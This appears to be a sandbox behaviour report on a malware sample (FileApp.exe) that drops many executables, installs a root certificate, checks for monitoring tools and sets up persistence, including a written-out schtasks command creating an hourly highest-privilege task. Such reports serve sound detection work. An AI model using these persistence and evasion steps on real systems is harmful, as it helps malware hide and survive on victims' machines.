Source: FileApp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: FileApp.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: FileApp.exe Static file information: File size 9522176 > 1048576
Source: FileApp.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x8b2600
Source: FileApp.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: FileApp.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000000.2385160822.0000000000BB2000.00000002.00000001.01000000.0000000B.sdmp, l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.0000000001605000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdb source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2656601610.00000000018B2000.00000004.00001000.00020000.00000000.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2767261547.0000000002610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\VXxHvcJSL.pdbI source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: premium_gitrep.pdbx source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000000.2385160822.0000000000BB2000.00000002.00000001.01000000.0000000B.sdmp, l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.0000000001605000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdbG source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2730398887.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.PDB source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015E2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\VXxHvcJSL.pdb source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2120455815.0000000004C21000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: PE.pdb source: FileApp.exe, 00000000.00000002.2120455815.0000000004221000.00000004.00000800.00020000.00000000.sdmp, FileApp.exe, 00000000.00000002.2130007558.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: adsbrowser.pdb(D source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: \??\C:\Windows\exe\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BotClient.pdb source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000000.2384928035.0000000000612000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: uht_7KlzJBHoKg010MzYxndX.exe, 0000000B.00000002.2656601610.00000000018B2000.00000004.00001000.00020000.00000000.sdmp, m9GWTeQylsPUCcnTEkTCS8lf.exe, 0000000C.00000002.2767261547.0000000002610000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: adsbrowser.pdb source: FileApp.exe, 00000000.00000000.2112885323.0000000000692000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: \??\C:\Users\user\Documents\iofolko5\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2574398005.00000000015B6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\press\AppData\Local\Temp\Report.A66214F7-6635-4084-8609-050NK772Dll\obj\Debug\sXnMStC.pdb source: B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2730398887.0000000005D00000.00000004.08000000.00040000.00000000.sdmp, B4LiZFzJ_IAKzmYhwI_ve0Iy.exe, 00000009.00000002.2600221718.00000000040E9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: HP.o<C:\Windows\premium_gitrep.pdb source: l6BAwR4854FJ5LVXvo8GWfAt.exe, 00000006.00000002.2563660175.00000000012F9000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Unpacked PE file: 7.2.kPy9KuGWnhtidoY4IdmVbiaT.exe.c60000.0.unpack :EW;.rsrc :W;.idata :W; :EW;tmvaidtc:EW;vymybyyn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;tmvaidtc:EW;vymybyyn:EW;.taggant:EW;
Source: FileApp.exe Static PE information: 0xE7847BAD [Sat Jan 31 05:48:29 2093 UTC]
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Code function: 14_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress, 14_2_00406312
Source: C:\Users\user\Desktop\FileApp.exe Code function: 0_2_05812921 pushfd ; retf 0_2_05812A05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_00565A60 push ecx; ret 2_2_00565A73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0609C711 push es; ret 21_2_0609C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0609D413 push es; ret 21_2_0609D420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 21_2_0609ECF2 push eax; ret 21_2_0609ED01
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_0041A9F5 push ecx; ret 22_2_0041AA08

Persistence and Installation Behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\627000\Legitimate.pif
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 Blob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\lamp[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\vcruntime140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d70775c548d_v[2].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66d60cd3ce002_SeparatelyDied[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66d1b7f7f3765_Front[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\nss3[1].dll
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe File created: C:\ProgramData\jewkkwnf\jewkkwnf.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\softokn3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\userEHJKFCGHID.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66d59ef9d4404_premium[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d7077a2064d_l[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\nss3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d70775c548d_v[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\freebl3[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\66d70e8640404_trics[1].exe
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe File created: C:\ProgramData\xprfjygruytr\etzpikspwykg.exe
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe File created: C:\Users\user\AppData\Local\Temp\PowerExpertNNT\PowerExpertNNT.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\mozglue[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66c6fcb30b9dd_123p[1].exe
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe File created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66d707730e9bf_s[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\userFBKKJEBFID.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66d58b1858bcb_crypted[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66d72df86b9f3_crypted[1].exe

Boot Survival

Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ExtreamFanV6

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Memory written: PID: 5776 base: 7FFDB4590008 value: E9 EB D9 E9 FF
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe Memory written: PID: 5776 base: 7FFDB442D9F0 value: E9 20 26 16 00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 22_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 22_2_004195E0
Source: C:\Users\user\Desktop\FileApp.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
